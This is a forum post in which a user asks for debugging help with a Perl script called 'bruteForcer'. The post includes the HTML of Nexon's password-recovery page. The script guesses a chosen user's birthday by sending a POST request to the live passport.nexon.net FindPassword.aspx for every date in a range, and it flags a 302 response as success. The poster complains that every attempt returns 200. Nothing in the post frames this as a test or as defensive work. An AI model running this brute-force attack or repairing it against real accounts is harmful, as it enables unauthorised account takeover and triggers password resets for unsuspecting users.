cartyman
New User
Jun 23, 2009, 9:57 AM
Post #1 of 3
(1288 views)
|
|
problem with some code
|
Can't Post
|
|
This is the source of the HTML page.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Find Nexon Passport P/W</title>
<link rel="icon" type="image/x-ico" href="http://nxcache.nexon.net/nexon.ico" />
<link href="http://nxcache.nexon.net/passport/login/css/styles.css" rel="stylesheet" type="text/css" />
<!--[if IE]><style type="text/css">ul{padding-left:16px;}.user_agreement_links{padding-left:0}.newsletter_checkbox{margin-top:20px;}</style><![endif]-->
<!--[if IE 6]><style type="text/css">select{width:75px;}.btn_signin{left:360px;}.form_find_pw label{margin-right:0;}</style><![endif]-->
<script type="text/javascript" src="http://nxcache.nexon.net/passport/login/js/user_agreement_information.js"></script>
</head>
<body class="NexonTheme">
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-1376772-5");
pageTracker._initData();
pageTracker._trackPageview();
</script>
<script src="http://www.nexon.net/JS/GNB/gnb_white.js" type="text/javascript"></script>
<h1 class="header_find_pw">Find Nexon Passport P/W</h1>
<div id="Wrapper">
<p class="caution_text">You’ll need to sign up for a Nexon Passport ID to enjoy games from Nexon along with its guilds, communities, and various other services.</p>
<form name="frmFindPassword" method="post" action="FindPassword.aspx" id="frmFindPassword" class="form_find_pw">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['frmFindPassword'];
if (!theForm) {
theForm = document.frmFindPassword;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=IhukqybiYJYzxkyv4awQwA2&t=633591871913968425" type="text/javascript"></script>
<script src="/WebResource.axd?d=Hn0ebIko3bvM1OkXkcIVug2&t=633591871913968425" type="text/javascript"></script>
<h2>Can’t remember your Password?</h2>
<p>Please enter your Nexon Passport ID and Birthday.<br /> A new random password will be sent to your account E-mail.</p>
<label class="passport_id">Nexon Passport ID</label><input name="txtNXID" type="text" id="txtNXID" tabindex="1" onKeydown="return frmCommnetKeyDownEvent(event)" />
<label class="birthday">Birthday</label>
<select name="ddlBirthMonth" id="ddlBirthMonth" tabindex="2">
<option selected="selected" value="Month">Month</option>
<option value="January">January</option>
<option value="February">February</option>
<option value="March">March</option>
<option value="April">April</option>
<option value="May">May</option>
<option value="June">June</option>
<option value="July">July</option>
<option value="August">August</option>
<option value="September">September</option>
<option value="October">October</option>
<option value="November">November</option>
<option value="December">December</option>
</select>
<select name="ddlBirthDay" id="ddlBirthDay" tabindex="3">
<option selected="selected" value="Day">Day</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select>
<select name="ddlBirthYear" id="ddlBirthYear" tabindex="4">
<option selected="selected" value="Year">Year</option>
<option value="2009">2009</option>
<option value="2008">2008</option>
<option value="2007">2007</option>
<option value="2006">2006</option>
<option value="2005">2005</option>
<option value="2004">2004</option>
<option value="2003">2003</option>
<option value="2002">2002</option>
<option value="2001">2001</option>
<option value="2000">2000</option>
<option value="1999">1999</option>
<option value="1998">1998</option>
<option value="1997">1997</option>
<option value="1996">1996</option>
<option value="1995">1995</option>
<option value="1994">1994</option>
<option value="1993">1993</option>
<option value="1992">1992</option>
<option value="1991">1991</option>
<option value="1990">1990</option>
<option value="1989">1989</option>
<option value="1988">1988</option>
<option value="1987">1987</option>
<option value="1986">1986</option>
<option value="1985">1985</option>
<option value="1984">1984</option>
<option value="1983">1983</option>
<option value="1982">1982</option>
<option value="1981">1981</option>
<option value="1980">1980</option>
<option value="1979">1979</option>
<option value="1978">1978</option>
<option value="1977">1977</option>
<option value="1976">1976</option>
<option value="1975">1975</option>
<option value="1974">1974</option>
<option value="1973">1973</option>
<option value="1972">1972</option>
<option value="1971">1971</option>
<option value="1970">1970</option>
<option value="1969">1969</option>
<option value="1968">1968</option>
<option value="1967">1967</option>
<option value="1966">1966</option>
<option value="1965">1965</option>
<option value="1964">1964</option>
<option value="1963">1963</option>
<option value="1962">1962</option>
<option value="1961">1961</option>
<option value="1960">1960</option>
<option value="1959">1959</option>
<option value="1958">1958</option>
<option value="1957">1957</option>
<option value="1956">1956</option>
<option value="1955">1955</option>
<option value="1954">1954</option>
<option value="1953">1953</option>
<option value="1952">1952</option>
<option value="1951">1951</option>
<option value="1950">1950</option>
<option value="1949">1949</option>
<option value="1948">1948</option>
<option value="1947">1947</option>
<option value="1946">1946</option>
<option value="1945">1945</option>
<option value="1944">1944</option>
<option value="1943">1943</option>
<option value="1942">1942</option>
<option value="1941">1941</option>
<option value="1940">1940</option>
<option value="1939">1939</option>
<option value="1938">1938</option>
<option value="1937">1937</option>
<option value="1936">1936</option>
<option value="1935">1935</option>
<option value="1934">1934</option>
<option value="1933">1933</option>
<option value="1932">1932</option>
<option value="1931">1931</option>
<option value="1930">1930</option>
<option value="1929">1929</option>
<option value="1928">1928</option>
<option value="1927">1927</option>
<option value="1926">1926</option>
<option value="1925">1925</option>
<option value="1924">1924</option>
</select>
<a href="javascript:window.location='http://www.nexon.net/Default.aspx';" class="btn_back" tabindex="6">Back</a>
<input type="submit" name="FindPW_Pre" value="OK" onclick="javascript:if( document.all('txtNXID').value == '' ) { alert('Please enter Nexon Passport ID.'); return false; };" id="FindPW_Pre" tabindex="5" class="btn_ok" />
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
</div>
<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('txtNXID');//]]>
</script>
</form>
<div class="watermark_image"><!-- Purely presentational, changes depending on passport parameter --></div>
<div class="character_image"><!-- Purely presentational, changes depending on passport parameter --></div>
</div><!-- close Wrapper -->
</body>
</html>
This is the perl code:
#!/usr/bin/perl
#
# (C)2007 spurified
#
# Usage:
# bruteForcer [UserID] [YearToStartAt]
#
########################################
$|=1;
use strict;
use Getopt::Std;
use LWP::UserAgent;
use HTTP::Request::Common;
use HTTP::Response;
use Switch;
## vardecs
##
my $method = "POST";
my $url = "http://passport.nexon.net/User/FindPassword.aspx";
my $uid = $ARGV[0];
my $NXIDvar = "txtNXID";
my $monthvar = "ddlBirthMonth";
my $dayvar = "ddlBirthDay";
my $yearvar = "ddlBirthYear";
## my $clickxvar = "FindPW_Pre.x";
## my $clickyvar = "FindPW_Pre.y";
my $clickvar = "FindPW_Pre";
my $viewstatvar = "__VIEWSTATE";
my $proxy = "";
my $header = "";
## hash for postreqs and headerinfos
##
my %PARAMS;
my %HEADERS;
## input validation
##
if ($url !~ /http:\/\//i && $url !~ /https:\/\//i)
{
$url = "http://".$url;
}
$url =~ s/[\n\r]//g;
## create user-agent
##
my $response;
my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1, SV1)");
$ua->proxy('http', $proxy) if($proxy ne '');
my $currMonth;
my $icurrMonth;
my $currDay;
my $currYear;
my $si;
my $k;
my $v;
for ($currYear = $ARGV[1]; $currYear < 2009; $currYear++)
{
for ($icurrMonth = 1; $icurrMonth < 13; $icurrMonth++)
{
switch ($icurrMonth) {
case 1 { $currMonth = "January"; }
case 2 { $currMonth = "February"; }
case 3 { $currMonth = "March"; }
case 4 { $currMonth = "April"; }
case 5 { $currMonth = "May"; }
case 6 { $currMonth = "June"; }
case 7 { $currMonth = "July"; }
case 8 { $currMonth = "August"; }
case 9 { $currMonth = "September"; }
case 10 { $currMonth = "October"; }
case 11 { $currMonth = "November"; }
case 12 { $currMonth = "December"; }
}
for ($currDay = 1; $currDay < 32; $currDay++)
{
## fill hash with
## parameters
##
$PARAMS{$NXIDvar} = $uid;
$PARAMS{$monthvar} = $currMonth;
$PARAMS{$dayvar} = $currDay;
$PARAMS{$yearvar} = $currYear;
## $PARAMS{$clickxvar} = "50";
#
# $PARAMS{$clickyvar} = "17";
$PARAMS{$clickvar} = "OK";
$PARAMS{$viewstatvar} =
"/wEPDwUKLTI0NDUxODUyMQ9kFgJmD2QWCmYPD2QWAh4Jb25LZXlkb3duBSRyZXR1cm4gZnJtQ29tbW5ldEtleURvd25FdmVudChldmVudClkAgEPEGQQFQ0F
TW9udGgHSmFudWFyeQhGZWJydWFyeQVNYXJjaAVBcHJpbANNYXkESnVuZQRKdWx5BkF1Z3VzdAlTZXB0ZW1iZXIHT2N0b2JlcghOb3ZlbWJlcghEZWNlbWJl
chUNBU1vbnRoB0phbnVhcnkIRmVicnVhcnkFTWFyY2gFQXByaWwDTWF5BEp1bmUESnVseQZBdWd1c3QJU2VwdGVtYmVyB09jdG9iZXIITm92ZW1iZXIIRGVjZ
W1iZXIUKwMNZ2dnZ2dnZ2dnZ2dnZ2RkAgIPEGQQFSADRGF5ATEBMgEzATQBNQE2ATcBOAE5AjEwAjExAjEyAjEzAjE0AjE1AjE2AjE3AjE4AjE5AjIwAjIxAj
IyAjIzAjI0AjI1AjI2AjI3AjI4AjI5AjMwAjMxFSADRGF5ATEBMgEzATQBNQE2ATcBOAE5AjEwAjExAjEyAjEzAjE0AjE1AjE2AjE3AjE4AjE5AjIwAjIxAjI
yAjIzAjI0AjI1AjI2AjI3AjI4AjI5AjMwAjMxFCsDIGdnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCAw8QZBAVVwRZZWFyBDIwMDkEMjAwOAQy
MDA3BDIwMDYEMjAwNQQyMDA0BDIwMDMEMjAwMgQyMDAxBDIwMDAEMTk5OQQxOTk4BDE5OTcEMTk5NgQxOTk1BDE5OTQEMTk5MwQxOTkyBDE5OTEEMTk5MAQxO
Tg5BDE5ODgEMTk4NwQxOTg2BDE5ODUEMTk4NAQxOTgzBDE5ODIEMTk4MQQxOTgwBDE5NzkEMTk3OAQxOTc3BDE5NzYEMTk3NQQxOTc0BDE5NzMEMTk3MgQxOT
cxBDE5NzAEMTk2OQQxOTY4BDE5NjcEMTk2NgQxOTY1BDE5NjQEMTk2MwQxOTYyBDE5NjEEMTk2MAQxOTU5BDE5NTgEMTk1NwQxOTU2BDE5NTUEMTk1NAQxOTU
zBDE5NTIEMTk1MQQxOTUwBDE5NDkEMTk0OAQxOTQ3BDE5NDYEMTk0NQQxOTQ0BDE5NDMEMTk0MgQxOTQxBDE5NDAEMTkzOQQxOTM4BDE5MzcEMTkzNgQxOTM1
BDE5MzQEMTkzMwQxOTMyBDE5MzEEMTkzMAQxOTI5BDE5MjgEMTkyNwQxOTI2BDE5MjUEMTkyNBVXBFllYXIEMjAwOQQyMDA4BDIwMDcEMjAwNgQyMDA1BDIwM
DQEMjAwMwQyMDAyBDIwMDEEMjAwMAQxOTk5BDE5OTgEMTk5NwQxOTk2BDE5OTUEMTk5NAQxOTkzBDE5OTIEMTk5MQQxOTkwBDE5ODkEMTk4OAQxOTg3BDE5OD
YEMTk4NQQxOTg0BDE5ODMEMTk4MgQxOTgxBDE5ODAEMTk3OQQxOTc4BDE5NzcEMTk3NgQxOTc1BDE5NzQEMTk3MwQxOTcyBDE5NzEEMTk3MAQxOTY5BDE5Njg
EMTk2NwQxOTY2BDE5NjUEMTk2NAQxOTYzBDE5NjIEMTk2MQQxOTYwBDE5NTkEMTk1OAQxOTU3BDE5NTYEMTk1NQQxOTU0BDE5NTMEMTk1MgQxOTUxBDE5NTAE
MTk0OQQxOTQ4BDE5NDcEMTk0NgQxOTQ1BDE5NDQEMTk0MwQxOTQyBDE5NDEEMTk0MAQxOTM5BDE5MzgEMTkzNwQxOTM2BDE5MzUEMTkzNAQxOTMzBDE5MzIEM
TkzMQQxOTMwBDE5MjkEMTkyOAQxOTI3BDE5MjYEMTkyNQQxOTI0FCsDV2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2
dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAgQPD2QWAh4Hb25DbGljawVwamF2YXNjcmlwdDppZiggZG9jdW1lbnQuYWxsKCd0eHR
OWElEJykudmFsdWUgPT0gJycgKSB7IGFsZXJ0KCdQbGVhc2UgZW50ZXIgTmV4b24gUGFzc3BvcnQgSUQuJyk7IHJldHVybiBmYWxzZTsgfWRk";
## check out all the headers
## and fill the HEADERS-hash
##
my @hpairs;
$si = $k = $v = "";
@hpairs = split(/&/,$header);
foreach $si (@hpairs)
{
($k,$v) = split(/:/,$si);
$HEADERS{"$k"} = $v;
}
## the request itself
$response = $ua->request(POST "$url", \%PARAMS, %HEADERS);
## check the response and
##
##my $page = $response->content();
my $code = $response->code();
if ($code eq "302")
{
print "$uid:$currYear:$currMonth:$currDay ***WORKED***\n";
exit;
}
else
{
print "$uid:$currYear:$currMonth:$currDay\n";
}
print "$code\n"
} # endpassloop
}
}
It returns code 200 for every try even if its the correct one.
Can anyone spot any problems?
|
MAIN
SEARCH
WHO'S 
LOG 
